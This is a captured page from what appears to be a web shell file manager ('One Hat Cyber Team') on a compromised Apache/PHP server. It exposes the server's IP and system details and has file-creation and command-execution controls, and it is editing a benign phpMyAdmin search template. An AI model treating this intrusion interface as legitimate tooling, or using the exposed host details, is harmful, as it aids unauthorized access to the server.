⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
search
/
Edit File: options.twig
{{ Util_getDivForSliderEffect('searchoptions', 'Options'|trans) }} {# Displays columns select list for selecting distinct columns in the search #}
{% trans 'Select columns (at least one):' %}
{% for each_field in column_names %}
{{ each_field }}
{% endfor %}
DISTINCT
{# Displays input box for custom 'Where' clause to be used in the search #}
{% trans 'Or' %}
{% trans 'Add search conditions (body of the "where" clause):' %}
{{ Util_showMySQLDocu('Functions') }}
{# Displays option of changing default number of rows displayed per page #}
{% trans 'Number of rows per page' %}
{# Displays option for ordering search results by a column value (Asc or Desc) #}
{% trans 'Display order:' %}
{% for each_field in column_names %}
{{ each_field }}
{% endfor %}
{{ Util_getRadioFields( 'order', { 'ASC': 'Ascending'|trans, 'DESC': 'Descending'|trans }, 'ASC', false, true, 'formelement' ) }}
Simpan